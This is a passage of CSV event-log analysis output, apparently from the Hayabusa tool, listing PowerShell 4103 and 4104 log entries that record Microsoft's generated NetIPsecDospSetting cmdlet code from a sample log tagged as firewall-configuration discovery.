[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, 
$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; 
value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecDospSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecDospSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecDospSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecDospSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration 
enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] 
${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterTyp",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"e = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { 
[object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter 
-Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} 